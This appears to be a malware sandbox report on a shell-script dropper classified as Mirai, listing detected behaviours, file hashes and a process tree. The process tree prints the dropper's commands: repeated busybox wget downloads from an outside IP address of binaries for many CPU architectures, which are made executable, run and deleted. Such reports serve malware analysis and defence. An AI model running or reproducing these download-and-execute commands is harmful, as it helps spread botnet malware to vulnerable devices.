Overview

overview

10

Static

static

1

dd5851b5ab...8aa.sh

ubuntu-18.04-amd64

10

dd5851b5ab...8aa.sh

debian-9-armhf

10

dd5851b5ab...8aa.sh

debian-9-mips

10

dd5851b5ab...8aa.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    18-02-2025 03:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh

  • Size

    1KB

  • MD5

    d011eee1c3ee60b1a1db3ae1e9e65ad6

  • SHA1

    18f4cee16484157375f8bbcf21acca220a258d66

  • SHA256

    dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa

  • SHA512

    ed73548c60e65449f31d4bc5ca644d2f59e72d0843a24b3236707338fbed8e26ed608897d0c5a26a971357e7d28b92a9ecb6d8d76d5f7d55e93bf0aa3dd3f6ac

Score
10/10
miraibotnetbotnetcredential_accessdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (138697) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 12 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Deletes itself 1 IoCs
  • Executes dropped EXE 9 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 2 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Reads process memory 1 TTPs 7 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

    credential_access
  • Changes its process name 1 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 27 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 9 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh
    /tmp/dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh
    1⤵
    • Executes dropped EXE
    PID:709
    • /bin/busybox
      /bin/busybox wget http://193.143.1.32/jklarm -O jklarm
      2⤵
      • Writes file to tmp directory
      PID:711
    • /bin/busybox
      /bin/busybox chmod +x jklarm
      2⤵
      • File and Directory Permissions Modification
      PID:736
    • /tmp/jklarm
      ./jklarm exploit
      2⤵
        PID:737
      • /bin/busybox
        /bin/busybox rm -rf jklarm
        2⤵
          PID:739
        • /bin/busybox
          /bin/busybox wget http://193.143.1.32/jklarm5 -O jklarm5
          2⤵
          • Writes file to tmp directory
          PID:740
        • /bin/busybox
          /bin/busybox chmod +x jklarm5
          2⤵
          • File and Directory Permissions Modification
          PID:743
        • /tmp/jklarm5
          ./jklarm5 exploit
          2⤵
            PID:744
          • /bin/busybox
            /bin/busybox rm -rf jklarm5
            2⤵
              PID:746
            • /bin/busybox
              /bin/busybox wget http://193.143.1.32/jklarm6 -O jklarm6
              2⤵
              • Writes file to tmp directory
              PID:747
            • /bin/busybox
              /bin/busybox chmod +x jklarm6
              2⤵
              • File and Directory Permissions Modification
              PID:748
            • /tmp/jklarm6
              ./jklarm6 exploit
              2⤵
                PID:749
              • /bin/busybox
                /bin/busybox rm -rf jklarm6
                2⤵
                  PID:751
                • /bin/busybox
                  /bin/busybox wget http://193.143.1.32/jklarm7 -O jklarm7
                  2⤵
                  • Writes file to tmp directory
                  PID:752
                • /bin/busybox
                  /bin/busybox chmod +x jklarm7
                  2⤵
                  • File and Directory Permissions Modification
                  PID:761
                • /tmp/jklarm7
                  ./jklarm7 exploit
                  2⤵
                    PID:762
                  • /bin/busybox
                    /bin/busybox rm -rf jklarm7
                    2⤵
                      PID:765
                    • /bin/busybox
                      /bin/busybox wget http://193.143.1.32/jklm68k -O jklm68k
                      2⤵
                      • Writes file to tmp directory
                      PID:767
                    • /bin/busybox
                      /bin/busybox chmod +x jklm68k
                      2⤵
                      • File and Directory Permissions Modification
                      PID:776
                    • /tmp/jklm68k
                      ./jklm68k exploit
                      2⤵
                        PID:777
                      • /bin/busybox
                        /bin/busybox rm -rf jklm68k
                        2⤵
                          PID:781
                        • /bin/busybox
                          /bin/busybox wget http://193.143.1.32/jklmips -O jklmips
                          2⤵
                          • System Network Configuration Discovery
                          • Writes file to tmp directory
                          PID:782
                        • /bin/busybox
                          /bin/busybox chmod +x jklmips
                          2⤵
                          • File and Directory Permissions Modification
                          PID:794
                        • /tmp/jklmips
                          ./jklmips exploit
                          2⤵
                          • System Network Configuration Discovery
                          PID:795
                        • /bin/busybox
                          /bin/busybox rm -rf jklmips
                          2⤵
                          • System Network Configuration Discovery
                          PID:798
                        • /bin/busybox
                          /bin/busybox wget http://193.143.1.32/jklmpsl -O jklmpsl
                          2⤵
                          • Writes file to tmp directory
                          PID:800
                        • /bin/busybox
                          /bin/busybox chmod +x jklmpsl
                          2⤵
                          • File and Directory Permissions Modification
                          PID:846
                        • /tmp/jklmpsl
                          ./jklmpsl exploit
                          2⤵
                          • Deletes itself
                          • Modifies Watchdog functionality
                          • Renames itself
                          • Enumerates active TCP sockets
                          • Reads process memory
                          • Changes its process name
                          • Reads system network configuration
                          • Reads runtime system information
                          PID:847
                        • /bin/busybox
                          /bin/busybox rm -rf jklmpsl
                          2⤵
                            PID:849
                          • /bin/busybox
                            /bin/busybox wget http://193.143.1.32/jklppc -O jklppc
                            2⤵
                            • Writes file to tmp directory
                            PID:851
                          • /bin/busybox
                            /bin/busybox chmod +x jklppc
                            2⤵
                            • File and Directory Permissions Modification
                            PID:852
                          • /tmp/jklppc
                            ./jklppc exploit
                            2⤵
                              PID:853
                            • /bin/busybox
                              /bin/busybox rm -rf jklppc
                              2⤵
                                PID:855
                              • /bin/busybox
                                /bin/busybox wget http://193.143.1.32/jklsh4 -O jklsh4
                                2⤵
                                • Writes file to tmp directory
                                PID:856
                              • /bin/busybox
                                /bin/busybox chmod +x jklsh4
                                2⤵
                                • File and Directory Permissions Modification
                                PID:859
                              • /tmp/jklsh4
                                ./jklsh4 exploit
                                2⤵
                                  PID:860
                                • /bin/busybox
                                  /bin/busybox rm -rf jklsh4
                                  2⤵
                                    PID:862
                                  • /bin/busybox
                                    /bin/busybox wget http://193.143.1.32/jklspc -O jklspc
                                    2⤵
                                      PID:863
                                    • /bin/busybox
                                      /bin/busybox chmod +x jklspc
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:864
                                    • /tmp/jklspc
                                      ./jklspc exploit
                                      2⤵
                                        PID:865
                                      • /bin/busybox
                                        /bin/busybox rm -rf jklspc
                                        2⤵
                                          PID:866
                                        • /bin/busybox
                                          /bin/busybox wget http://193.143.1.32/jklx86 -O jklx86
                                          2⤵
                                            PID:867
                                          • /bin/busybox
                                            /bin/busybox chmod +x jklx86
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:868
                                          • /tmp/jklx86
                                            ./jklx86 exploit
                                            2⤵
                                              PID:869
                                            • /bin/busybox
                                              /bin/busybox rm -rf jklx86
                                              2⤵
                                                PID:870
                                              • /bin/busybox
                                                /bin/busybox wget http://193.143.1.32/jklarc -O jklarc
                                                2⤵
                                                  PID:871
                                                • /bin/busybox
                                                  /bin/busybox chmod +x jklarc
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:872
                                                • /tmp/jklarc
                                                  ./jklarc exploit
                                                  2⤵
                                                    PID:873
                                                  • /bin/busybox
                                                    /bin/busybox rm -rf jklarc
                                                    2⤵
                                                      PID:874
                                                    • /bin/busybox
                                                      /bin/busybox rm -rf wget.sh
                                                      2⤵
                                                        PID:875

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • /tmp/jklarm
                                                      Filesize

                                                      54KB

                                                      MD5

                                                      60323049a9468c264a9535600a053b6e

                                                      SHA1

                                                      960ec393b1590fee232414d8d8f279b189573b6f

                                                      SHA256

                                                      3ac4757c406bac2bedd2771c5c137607e2788099782ca939cb40c32aa2c71343

                                                      SHA512

                                                      e1e33d7bf40b34e4a90a88b2ada4822dc150ae705ae118f2a169f1dc427a4bad4fcc6a0e3e668483024395ae9005d2bef1ac82952774b359063dbc6f32e44954

                                                      Download Submit

                                                    • /tmp/jklarm5
                                                      Filesize

                                                      54KB

                                                      MD5

                                                      368f814e3fcc026df077492406916cfb

                                                      SHA1

                                                      94a499401b79d75a6c1df3eb205dc44057425f5b

                                                      SHA256

                                                      4cb919fe578f5a95e86157987898bb2959019260992578f42e7abd79f3d864ce

                                                      SHA512

                                                      e334932543ea5bead5ea96f13191f967e63893b92ffa2fe6793afe5d39615f46c2b62ab4ff8846f78cffeb32dd51ae6a88ba36dd59cab8da75a1cbd0f1b842cc

                                                      Download Submit

                                                    • /tmp/jklarm6
                                                      Filesize

                                                      65KB

                                                      MD5

                                                      3efe981dfb09404a90020f31b91a0d99

                                                      SHA1

                                                      75dad217f8faab13473fa87f1f90cfab16646e67

                                                      SHA256

                                                      b0200c4648356ccc6af1711e1673c133c8f785611b10d49f925958507bb8b213

                                                      SHA512

                                                      6f5068a4d9fa7e6db711cb6207a3316a24d58d68e6996e211d6a10ac5eee3b67adbd8677d7f4061eac2476b5596c9c767055ab3a19bcf569137c7ca3ed8177fc

                                                      Download Submit

                                                    • /tmp/jklarm7
                                                      Filesize

                                                      77KB

                                                      MD5

                                                      82feacfdba7096dd1f30ae81b443ed99

                                                      SHA1

                                                      1ffc5f931d6bbf76e3ae065033fc5cb95a9e8a33

                                                      SHA256

                                                      dec770c2901a222ec48915adfe1f7c6091fc3e9b03941a53f44b21593af862d2

                                                      SHA512

                                                      07f59c67b2c32911d031816713ad9bcd36f2b3beaf9c7645c1d3b73fc29fb2d09aef648a08fd6f83037bf3731d287babcfc7c228fac7af465bc79ad325477c9d

                                                      Download Submit

                                                    • /tmp/jklm68k
                                                      Filesize

                                                      55KB

                                                      MD5

                                                      0e6cf4992f8f2394394ca5972339a663

                                                      SHA1

                                                      acd7245a3e7b0f394100658336e10aaa2774771d

                                                      SHA256

                                                      30c5e7b561a3e61ab67af8181fd6b996258325bf8137531ffe9d2b3f438a3d46

                                                      SHA512

                                                      66f9c4f37e8c039a2b435a213629992a88b15609f3d449b1552a5aade52981d8679b1f949b35d9edfc2522a2c5acd4efbb4ed55b64ec08d55818205b8cc78c10

                                                      Download Submit

                                                    • /tmp/jklmips
                                                      Filesize

                                                      70KB

                                                      MD5

                                                      9f505111a75f65954723020bee516bc1

                                                      SHA1

                                                      0aa2fbd97682553fcfd5a6494e09498c04df96b3

                                                      SHA256

                                                      5e2d9f9531aff471dd5d92b772c57ba66cfb39aefef46fb878f3d30db9a8c1c8

                                                      SHA512

                                                      66fe3d79c76e4c773b6512f90ed9b3dd60cba157882a8093931c60c5771191c1c8442ee96121fb9e578056dfa91a6878f4271e1e2e02fdd4c73d50e33ceac640

                                                      Download Submit

                                                    • /tmp/jklmpsl
                                                      Filesize

                                                      74KB

                                                      MD5

                                                      e21d64812567d5607c06f765f06b40c2

                                                      SHA1

                                                      c05d80301c864dbc3b4176406fb2e33870f916ed

                                                      SHA256

                                                      3132f0d33ba9fc64e8258e2094745f4fe60d4f044b5b8fe0aef5e311d9e0adaf

                                                      SHA512

                                                      30a3416d773cb0bc0f68a8198e860d31c0c9e860f43338ba4dcb2fc2ccfa254ddf9b390ead160935235db6a7509f1caaea2c8b148743e400591c764ec3e5e9e5

                                                      Download Submit

                                                    • /tmp/jklppc
                                                      Filesize

                                                      53KB

                                                      MD5

                                                      62cafb625700d87c3242d68320221463

                                                      SHA1

                                                      54f17fd56f5b8e61a5c398f08c341be52b3451a1

                                                      SHA256

                                                      6a541797dea9e8cdf398344bde77b8d9255d96b295edb8152a0dc9864f799666

                                                      SHA512

                                                      dce3448426b786ef1ad705943682b056ae6080e526cd78121bdf3be4e5e0b95ead681385aa67bdf8a6d69b311aaf7869f2d312bc9dca982b53e89a418b356451

                                                      Download Submit

                                                    • /tmp/jklsh4
                                                      Filesize

                                                      49KB

                                                      MD5

                                                      9cc4266655df49f75cd670196805381d

                                                      SHA1

                                                      306ae940daff8f92e333069f0429b914ebae59f0

                                                      SHA256

                                                      3e0982830ebdeff2461f1fae1bb37c3362884ea8614ffcaba90e2409d09b387f

                                                      SHA512

                                                      bc16cc80fde9803ddbd22fece05e276aefe43b28d609eb7d494a0e049effa559d0f0d389eaa9b9e30f615fdcfec51b54586ba93da9aa12a315b9fad7372a228b

                                                      Download Submit